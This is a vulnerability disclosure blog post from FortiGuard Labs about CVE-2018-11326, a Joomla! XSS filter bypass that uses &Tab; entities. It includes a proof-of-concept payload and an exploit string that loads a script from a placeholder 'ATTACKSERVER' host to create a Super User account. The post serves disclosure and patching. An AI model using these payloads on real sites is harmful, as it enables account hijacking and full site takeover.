FortiGuard Labs Threat Research

Incomplete Patch: Another Joomla! Core XSS Vulnerability Is Discovered

By Zhouyuan Yang | May 25, 2018

In a previous FortiGuard Labs blog I documented that Joomla! had failed to patch two Cross-Site Scripting (XSS) vulnerabilities – CVE-2017-7985 and CVE-2017-7986 – that I had previously discovered. After reporting the issue to Joomla!, they released a patch and published a separate security announcement in July of 2017. But this separate patch still doesn’t fully fix the issue. Earlier this year, I discovered a new way to bypass the Joomla! XSS filter at the same injection point. This new vulnerability has been assigned with the CVE ID CVE-2018-11326.

Just as with CVE-2017-7985 and CVE-2017-7986, this new injection point exists in the front end, under the “post or edit an article” function. Remote attackers with post or edit permission could insert malicious code into Joomla! and then execute it in the context of a victim’s browser. This could then allow a remote attacker to gain control of the victim’s browser and hijack their Joomla! account.  An attacker can then take aim at higher permission Joomla! accounts. A successfully established attack could eventually allow a remote attacker to take over the full web site.

This new vulnerability affects Joomla! CMS versions 3.0.0 through 3.8.7. In this blog, I’ll share my analysis of this vulnerability.


In its previous patches, Joomla! XSS sanitizer fixed the bypass issues with keywords like “:” and “%0d%0a”. But the sanitizer didn’t address the special HTML TAB element. JavaScript will not break a code with “	” element inserted. For example, “javascript:alert(1)” is the same as “java	script:alert(1)”, but it is not recognized by the Joomla! XSS sanitizer.


The PoC I used in this analysis is the same as the one I used in my previous post. I also used the same account, “yzy1”, which only has the publisher permission and is not allowed to use full HTML elements.

Before I inserted the code for my test, I changed the default editor to none in order to bypass the Joomla! Front end XSS protection, as shown in Figure 1.

Figure 1. Changing the default Editor to None

The way to break the Joomla! XSS filter is by taking advantage of the HTML TAB element, such as changing “<a href="javascript:alert(document.domain)">Click Me</a>” to “<a href="javas&Tab;cript:alert(&Tab;document.domain&Tab;)">Click Me</a>”. In this way, an attacker can bypass the Joomla! XSS filter and insert arbitrary JavaScript code. The inserted code will then be executed in the Administrator’ page, as shown in Figures 2 and 3.

Figure 2. PoC for CVE-2018-11326
Figure 3. Code being executed in the Administrator’s page



The exploit can be same as the one I used in my last post. I only need to modify the code to:

“<a href="javas&Tab;cript:var head= document.getElementsByTagName('head')[0];var script= document.createElement('script');script.type= 'text/javascript';script.src= 'http://ATTACKSERVER/joomlaAddAdmin.js';head.appendChild(script);">Click Me</a>”

When the Joomla! administrator accesses the web page containing the inserted code, a new Super User is automatically created with the username ‘Fortinet Yzy’ and the password ‘test’.


All users of Joomla! should upgrade to the latest version immediately. Additionally, organizations using Fortinet IPS solutions are already protected from this vulnerability with the following signature:



Check out our latest Quarterly Threat Landscape Report for more details about recent threats.

Sign up for our weekly FortiGuard intel briefs or for our FortiGuard Threat Intelligence Service.